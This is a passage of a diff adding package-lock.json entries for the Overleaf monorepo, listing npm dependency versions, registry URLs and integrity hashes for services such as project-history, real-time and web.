"https://registry.npmjs.org/react-fast-compare/-/react-fast-compare-3.2.2.tgz", + "integrity": "sha512-nsO+KSNgo1SbJqJEYRE9ERzo7YtYbou/OqjSQKxV7jcKox7+usiUVZOAC+XnDOABXggQTno0Y1CpVnuWEc1boQ==" + }, + "services/latexqc/node_modules/react-helmet": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/react-helmet/-/react-helmet-6.1.0.tgz", + "integrity": "sha512-4uMzEY9nlDlgxr61NL3XbKRy1hEkXmKNXhjbAIOVw5vcFrsdYbH2FEwcNyWvWinl103nXgzYNlns9ca+8kFiWw==", + "dependencies": { + "object-assign": "^4.1.1", + "prop-types": "^15.7.2", + "react-fast-compare": "^3.1.1", + "react-side-effect": "^2.1.0" + }, + "peerDependencies": { + "react": ">=16.3.0" + } + }, + "services/latexqc/node_modules/react-helmet/node_modules/react-side-effect": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/react-side-effect/-/react-side-effect-2.1.2.tgz", + "integrity": "sha512-PVjOcvVOyIILrYoyGEpDN3vmYNLdy1CajSFNt4TDsVQC5KpTijDvWVoR+/7Rz2xT978D8/ZtFceXxzsPwZEDvw==", + "peerDependencies": { + "react": "^16.3.0 || ^17.0.0 || ^18.0.0" + } + }, + "services/latexqc/node_modules/saxes": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/saxes/-/saxes-6.0.0.tgz", + "integrity": "sha512-xAg7SOnEhrm5zI3puOOKyy1OMcMlIJZYNJY7xLBwSze0UjhPLnWfj2GF2EpT0jmzaJKIWKHLsaSSajf35bcYnA==", + "dev": true, + "dependencies": { + "xmlchars": "^2.2.0" + }, + "engines": { + "node": ">=v12.22.7" + } + }, + "services/latexqc/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "services/latexqc/node_modules/schema-utils/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "services/latexqc/node_modules/schema-utils/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "services/latexqc/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "services/latexqc/node_modules/sinon": { + "version": "19.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-19.0.2.tgz", + "integrity": "sha512-euuToqM+PjO4UgXeLETsfQiuoyPXlqFezr6YZDFwHR3t4qaX0fZUe1MfPMznTL5f8BWrVS89KduLdMUsxFCO6g==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1", + "@sinonjs/fake-timers": "^13.0.2", + "@sinonjs/samsam": "^8.0.1", + "diff": "^7.0.0", + "nise": "^6.1.1", + "supports-color": "^7.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/latexqc/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/latexqc/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "services/latexqc/node_modules/type-detect": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.1.0.tgz", + "integrity": "sha512-Acylog8/luQ8L7il+geoSxhEkazvkslg7PSNKOX59mbB9cOveP5aq9h74Y7YU8yDpJwetzQQrfIwtf4Wp4LKcw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/universal-cookie": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/universal-cookie/-/universal-cookie-7.2.0.tgz", + "integrity": "sha512-PvcyflJAYACJKr28HABxkGemML5vafHmiL4ICe3e+BEKXRMt0GaFLZhAwgv637kFFnnfiSJ8e6jknrKkMrU+PQ==", + "dependencies": { + "@types/cookie": "^0.6.0", + "cookie": "^0.6.0" + } + }, + "services/latexqc/node_modules/w3c-xmlserializer": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-4.0.0.tgz", + "integrity": "sha512-d+BFHzbiCx6zGfz0HyQ6Rg69w9k19nviJspaj4yNscGjrHu94sVP+aRm75yEbCh+r2/yR+7q6hux9LVtbuTGBw==", + "dev": true, + "dependencies": { + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "services/latexqc/node_modules/webpack-dev-middleware": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-6.1.3.tgz", + "integrity": "sha512-A4ChP0Qj8oGociTs6UdlRUGANIGrCDL3y+pmQMc+dSsraXHCatFpmMey4mYELA+juqwUqwQsUgJJISXl1KWmiw==", + "dev": true, + "dependencies": { + "colorette": "^2.0.10", + "memfs": "^3.4.12", + "mime-types": "^2.1.31", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "services/latexqc/node_modules/whatwg-url": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-11.0.0.tgz", + "integrity": "sha512-RKT8HExMpoYx4igMiVMY83lN6UeITKJlBQ+vR/8ZJ8OCdSiN3RwCq+9gH0+Xzj0+5IrM6i4j/6LuvzbZIQgEcQ==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/notifications": { + "name": "@overleaf/notifications", + "license": "ISC", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "method-override": "^3.0.0", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/project-history": { + "name": "@overleaf/project-history", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "aws-sdk": "^2.650.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "esmock": "^2.6.3", + "express": "^4.21.2", + "lodash": "^4.17.20", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "overleaf-editor-core": "*", + "p-queue": "^8.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "nock": "^13.5.3", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/project-history/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/project-history/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/project-history/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/real-time": { + "name": "@overleaf/real-time", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64id": "0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "connect-redis": "^6.1.3", + "cookie-parser": "^1.4.6", + "express": "^4.21.2", + "express-session": "^1.17.1", + "joi": "^17.12.0", + "lodash": "^4.17.21", + "proxy-addr": "^2.0.7", + "request": "^2.88.2", + "socket.io": "github:overleaf/socket.io#0.9.19-overleaf-11", + "socket.io-client": "github:overleaf/socket.io-client#0.9.17-overleaf-5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cookie-signature": "^1.1.0", + "mocha": "^11.1.0", + "sandboxed-module": "~0.3.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "0.0.4", + "typescript": "^5.0.4", + "uid-safe": "^2.1.5" + } + }, + "services/real-time/node_modules/sandboxed-module": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/sandboxed-module/-/sandboxed-module-0.3.0.tgz", + "integrity": "sha1-8fvvvYCaT2kHO9B8rm/H2y6vX2o=", + "dev": true, + "dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.6" + } + }, + "services/real-time/node_modules/stack-trace": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.6.tgz", + "integrity": "sha1-HnGb1qJin/CcGJ4Xqe+QKpT8XbA=", + "dev": true, + "engines": { + "node": "*" + } + }, + "services/real-time/node_modules/timekeeper": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/timekeeper/-/timekeeper-0.0.4.tgz", + "integrity": "sha1-kNt58X2Ni1NiFUOJSSuXJ2LP0nY=", + "dev": true + }, + "services/references": { + "name": "@overleaf/references", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "ioredis": "^4.16.1", + "lodash": "^4.17.19" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.9", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/references/node_modules/esmock": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.9.tgz", + "integrity": "sha512-SJ5YnoWi8yuGghBrupScARmIcUh2A2a2gIfdVRtQ2MQpQo91wMWHx/fsN0ZDERLAUso1ea4Q/9CKCL88O5MEpg==", + "dev": true, + "engines": { + "node": ">=14.16.0" + } + }, + "services/spelling": { + "name": "@overleaf/spelling", + "version": "0.1.4", + "extraneous": true, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.0", + "lru-cache": "^5.1.1", + "request": "^2.88.2", + "underscore": "1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^10.2.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/templates": { + "name": "@overleaf/templates", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "args-js": "0.10.12", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "install": "^0.13.0", + "lodash": "^4.17.21", + "marked": "^4.1.0", + "method-override": "^3.0.0", + "mongoose": "^8.9.5", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/third-party-datastore": { + "name": "@overleaf/third-party-datastore", + "dependencies": { + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dropbox": "^10.34.0", + "express": "^4.21.2", + "lodash": "^4.17.21", + "lru-cache": "^4.1.5", + "minimatch": "^7.4.2", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "node-fetch": "^2.7.0", + "p-limit": "^2.3.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "9.0.1", + "sinon-chai": "^3.7.0", + "sinon-stub-promise": "^4.0.0", + "typescript": "^5.0.4" + } + }, + "services/third-party-datastore/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "services/third-party-datastore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/third-party-datastore/node_modules/lru-cache": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-4.1.5.tgz", + "integrity": "sha512-sWZlbEP2OsHNkXrMl5GYk/jKk70MBng6UU4YI/qGDYbgf6YbP4EvmqISbXCoJiRKs+1bSpFHVgQxvJ17F2li5g==", + "dependencies": { + "pseudomap": "^1.0.2", + "yallist": "^2.1.2" + } + }, + "services/third-party-datastore/node_modules/minimatch": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-7.4.2.tgz", + "integrity": "sha512-xy4q7wou3vUoC9k1xGTXc+awNdGaGVHtFUaey8tiX4H1QRc04DZ/rmDFwNm2EBsuYEhAZ6SgMmYf3InGY6OauA==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "services/third-party-datastore/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/third-party-datastore/node_modules/sinon": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.1.tgz", + "integrity": "sha512-iTTyiQo5T94jrOx7X7QLBZyucUJ2WvL9J13+96HMfm2CGoJYbIPqRfl6wgNcqmzk0DI28jeGx5bUTXizkrqBmg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0", + "@sinonjs/fake-timers": "^6.0.0", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/third-party-datastore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/third-party-datastore/node_modules/yallist": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-2.1.2.tgz", + "integrity": "sha1-HBH5IY8HYImkfdUS+TxmmaaoHVI=" + }, + "services/third-party-references": { + "name": "@overleaf/thirdparty-references", + "license": "ISC", + "dependencies": { + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.0", + "lodash": "^4.17.21", + "lru-cache": "^5.1.1", + "mongodb-legacy": "6.1.3", + "oauth": "0.9.15", + "request": "^2.88.2", + "simple-oauth2": "^5.0.0" + }, + "devDependencies": { + "@types/simple-oauth2": "^5.0.7", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/third-party-references/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/third-party-references/node_modules/sinon": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.2.tgz", + "integrity": "sha512-0uF8Q/QHkizNUmbK3LRFqx5cpTttEVXudywY9Uwzy8bTfZUhljZ7ARzSxnRHWYWtVTeh4Cw+tTb3iU21FQVO9A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/third-party-references/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/tpdsworker": { + "name": "@overleaf/tpdsworker", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dtrace-provider": "^0.8.8", + "express": "^4.21.2", + "express-basic-auth": "^1.2.0", + "ioredis": "^4.16.0", + "lodash": "^4.17.15", + "redlock": "^4.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-http": "^4.4.0", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/web": { + "name": "@overleaf/web", + "dependencies": { + "@contentful/rich-text-html-renderer": "^16.0.2", + "@contentful/rich-text-types": "^16.0.2", + "@google-cloud/bigquery": "^6.0.1", + "@node-oauth/oauth2-server": "^5.1.0", + "@node-saml/passport-saml": "^4.0.4", + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@phosphor-icons/react": "^2.1.7", + "@slack/webhook": "^7.0.2", + "@stripe/react-stripe-js": "^3.1.1", + "@stripe/stripe-js": "^5.6.0", + "@xmldom/xmldom": "^0.7.13", + "accepts": "^1.3.7", + "ajv": "^8.12.0", + "archiver": "^5.3.0", + "async": "^3.2.5", + "base-x": "^4.0.0", + "basic-auth": "^2.0.1", + "bcrypt": "^5.0.0", + "body-parser": "^1.20.3", + "bowser": "^2.11.0", + "bull": "^3.18.0", + "bunyan": "^1.8.15", + "cache-flow": "^1.9.0", + "celebrate": "^15.0.3", + "connect-redis": "^6.1.3", + "content-disposition": "^0.5.0", + "contentful": "^10.8.5", + "cookie": "^0.2.3", + "cookie-parser": "1.4.6", + "crc-32": "^1.2.2", + "csurf": "^1.11.0", + "csv": "^6.2.5", + "dateformat": "1.0.4-1.2.3", + "east": "^2.0.2", + "ejs": "^3.1.10", + "email-addresses": "^5.0.0", + "eventsource-parser": "^1.1.2", + "express": "^4.21.2", + "express-bearer-token": "^2.4.0", + "express-http-proxy": "^1.6.0", + "express-session": "^1.17.1", + "globby": "^5.0.0", + "helmet": "^6.0.1", + "https-proxy-agent": "^7.0.6", + "i18next": "^23.10.0", + "i18next-fs-backend": "^2.3.1", + "i18next-http-middleware": "^3.5.0", + "joi": "^17.12.0", + "jose": "^4.3.8", + "json2csv": "^4.3.3", + "jsonwebtoken": "^9.0.0", + "lodash": "^4.17.19", + "lru-cache": "^7.10.1", + "marked": "^4.1.0", + "method-override": "^2.3.3", + "minimatch": "^7.4.2", + "minimist": "^1.2.7", + "mmmagic": "^0.5.3", + "moment": "^2.29.4", + "mongodb-legacy": "6.1.3", + "mongoose": "8.9.5", + "multer": "overleaf/multer#e1df247fbf8e7590520d20ae3601eaef9f3d2e9e", + "nocache": "^2.1.0", + "node-fetch": "^2.7.0", + "nodemailer": "^6.7.0", + "nodemailer-ses-transport": "^1.5.1", + "on-headers": "^1.0.2", + "otplib": "^12.0.1", + "p-limit": "^2.3.0", + "p-props": "4.0.0", + "p-queue": "^8.1.0", + "parse-data-url": "^2.0.0", + "passport": "^0.6.0", + "passport-google-oauth20": "^2.0.0", + "passport-ldapauth": "^2.1.4", + "passport-local": "^1.0.0", + "passport-oauth2": "^1.5.0", + "passport-orcid": "0.0.4", + "pug": "^3.0.3", + "pug-runtime": "^3.0.1", + "rate-limiter-flexible": "^2.4.1", + "recurly": "^4.0.0", + "referer-parser": "github:overleaf/nodejs-referer-parser#8b8b103762d05b7be4cfa2f810e1d408be67d7bb", + "request": "^2.88.2", + "requestretry": "^7.1.0", + "sanitize-html": "^2.8.1", + "stripe": "^17.7.0", + "tough-cookie": "^4.0.0", + "tsscmp": "^1.0.6", + "uid-safe": "^2.1.5", + "utf-8-validate": "^5.0.2", + "valid-data-url": "^2.0.0", + "valid-url": "^1.0.9", + "xml-crypto": "^2.1.6", + "xml2js": "^0.6.2", + "xregexp": "^4.3.0", + "yauzl": "^2.10.0" + }, + "devDependencies": { + "@babel/cli": "^7.24.8", + "@babel/core": "^7.25.2", + "@babel/preset-env": "^7.25.3", + "@babel/preset-react": "^7.24.7", + "@babel/preset-typescript": "^7.24.7", + "@babel/register": "^7.24.6", + "@codemirror/autocomplete": "github:overleaf/codemirror-autocomplete#6445cd056671c98d12d1c597ba705e11327ec4c5", + "@codemirror/commands": "^6.8.0", + "@codemirror/lang-markdown": "^6.3.2", + "@codemirror/language": "^6.10.8", + "@codemirror/lint": "^6.8.4", + "@codemirror/search": "github:overleaf/codemirror-search#04380a528c339cd4b78fb10b3ef017f657ec17bd", + "@codemirror/state": "^6.5.2", + "@codemirror/view": "^6.36.3", + "@juggle/resize-observer": "^3.3.1", + "@lezer/common": "^1.2.3", + "@lezer/generator": "^1.7.1", + "@lezer/highlight": "^1.2.1", + "@lezer/lr": "^1.4.2", + "@lezer/markdown": "^1.3.2", + "@overleaf/codemirror-tree-view": "^0.1.3", + "@overleaf/dictionaries": "https://github.com/overleaf/dictionaries/archive/refs/tags/v0.0.3.tar.gz", + "@overleaf/ranges-tracker": "*", + "@overleaf/stream-utils": "*", + "@pmmmwh/react-refresh-webpack-plugin": "^0.5.15", + "@pollyjs/adapter-node-http": "^6.0.6", + "@pollyjs/core": "^6.0.6", + "@pollyjs/persister-fs": "^6.0.6", + "@replit/codemirror-emacs": "overleaf/codemirror-emacs#4394c03858f27053f8768258e9493866e06e938e", + "@replit/codemirror-indentation-markers": "overleaf/codemirror-indentation-markers#78264032eb286bc47871569ae87bff5ca1c6c161", + "@replit/codemirror-vim": "overleaf/codemirror-vim#1bef138382d948018f3f9b8a4d7a70ab61774e4b", + "@sentry/browser": "7.46.0", + "@storybook/addon-a11y": "^8.6.4", + "@storybook/addon-essentials": "^8.6.4", + "@storybook/addon-interactions": "^8.6.4", + "@storybook/addon-links": "^8.6.4", + "@storybook/addon-styling-webpack": "^1.0.1", + "@storybook/addon-webpack5-compiler-babel": "^3.0.5", + "@storybook/cli": "^8.6.4", + "@storybook/react": "^8.6.4", + "@storybook/react-webpack5": "^8.6.4", + "@storybook/theming": "^8.6.4", + "@testing-library/cypress": "^10.0.1", + "@testing-library/dom": "^9.3.0", + "@testing-library/react": "^12.1.5", + "@testing-library/react-hooks": "^8.0.1", + "@testing-library/user-event": "^14.4.3", + "@types/bootstrap": "^5.2.10", + "@types/bootstrap-5": "npm:@types/bootstrap@^5.2.10", + "@types/chai": "^4.3.0", + "@types/dateformat": "^5.0.2", + "@types/diff": "^5.0.9", + "@types/events": "^3.0.0", + "@types/express": "^4.17.13", + "@types/mocha": "^9.1.0", + "@types/mocha-each": "^2.0.0", + "@types/react": "^17.0.40", + "@types/react-bootstrap": "^0.32.36", + "@types/react-color": "^3.0.6", + "@types/react-dom": "^17.0.13", + "@types/react-google-recaptcha": "^2.1.5", + "@types/react-linkify": "^1.0.0", + "@types/recurly__recurly-js": "^4.22.0", + "@types/sinon-chai": "^3.2.8", + "@types/uuid": "^9.0.8", + "@uppy/core": "^3.8.0", + "@uppy/dashboard": "^3.7.1", + "@uppy/drag-drop": "^3.0.3", + "@uppy/file-input": "^3.0.4", + "@uppy/progress-bar": "^3.0.4", + "@uppy/react": "^3.2.1", + "@uppy/utils": "^5.7.0", + "@uppy/xhr-upload": "^3.6.0", + "5to6-codemod": 